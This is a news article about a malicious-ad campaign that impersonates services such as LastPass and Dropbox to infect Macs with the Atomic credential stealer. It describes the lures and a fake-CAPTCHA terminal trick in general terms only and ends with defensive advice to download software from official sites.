Cyber Threats: Malicious Ads Impersonating Online Services Infect Macs with Potent Credential Stealer
A recent surge in malicious ads, designed to impersonate various online services, has been targeting Mac users with a potent credential stealer known as Atomic or Amos Stealer. The campaign, which has left multiple security companies warning of the threat, has seen ads prominently displayed on search engines such as Google and Bing, posing as authentic advertisements for well-known brands like LastPass, 1Password, Basecamp, Dropbox, and many others.
The malicious ads have been specifically crafted to target Mac users, with a focus on installing the Atomic credential stealer. This powerful tool is capable of stealing sensitive information from infected devices, including passwords, login credentials, and other confidential data. The campaign has been particularly successful in targeting LastPass users, with dozens reported to have fallen victim to the scam.
The ads, which are designed to mimic legitimate advertisements for popular software and services, often feature prominent fonts and attractive graphics. However, when clicked, they lead to GitHub pages that install versions of Atomic disguised as the official software being falsely advertised. In some cases, the malicious installers may offer to install the stealer through the downloading of a file in the Mac-proprietary .dmg format.
Gatekeeper-Bypassing Technique Used by Attackers
In recent months, researchers have warned of a Gatekeeper-bypassing technique used by attackers to evade detection. This method masquerades as a CAPTCHA, requiring users to copy and paste a text string into the Mac terminal window. However, in reality, the string is a command to download and install the malicious .dmg with no intervention from Gatekeeper. This technique has been used by attackers for at least 20 months, highlighting the ongoing threat posed by this credential stealer.
Impersonation of Multiple Online Services
The campaign’s success can be attributed to its ability to impersonate multiple online services, including:
- LastPass
- 1Password
- Basecamp
- Dropbox
- Gemini
- Hootsuite
- Notion
- Obsidian
- Robinhood
- Salesloft
- SentinelOne
- Shopify
- Thunderbird
- TweetDeck
These impersonations have been used to trick users into installing the Atomic credential stealer, which is often disguised as a legitimate software update or installation. The campaign’s effectiveness can be seen in its ability to target users of various software and services, including Homebrew, a tool indispensable for many developers of macOS-compatible apps.
Protecting Yourself from Malicious Ads
To avoid falling victim to this scam, users should exercise caution when interacting with online ads. Specifically:
- Only download software from links provided on the official website.
- If an ad is viewed and a decision is made to install the promoted app, open a new tab and visit the official website directly rather than clicking on the download link in the ad.
Indicators of Compromise (IoCs)
LastPass has shared indicators of compromise (IoCs) to help security teams detect cyber threats:
- GitHub pages impersonating popular software and services.
- Download links for malicious .dmg files.
- CAPTCHA-style prompts that require users to copy and paste text strings into the Mac terminal window.
Conclusion
The recent surge in malicious ads, designed to impersonate online services and infect Macs with a potent credential stealer, serves as a reminder of the ongoing threat posed by cyber attacks. The campaign’s ability to target multiple software and services highlights the need for users to exercise caution when interacting with online ads and only download software from official websites. By sharing indicators of compromise (IoCs) and raising awareness about this threat, LastPass aims to protect its customers while pursuing takedown and disruption efforts.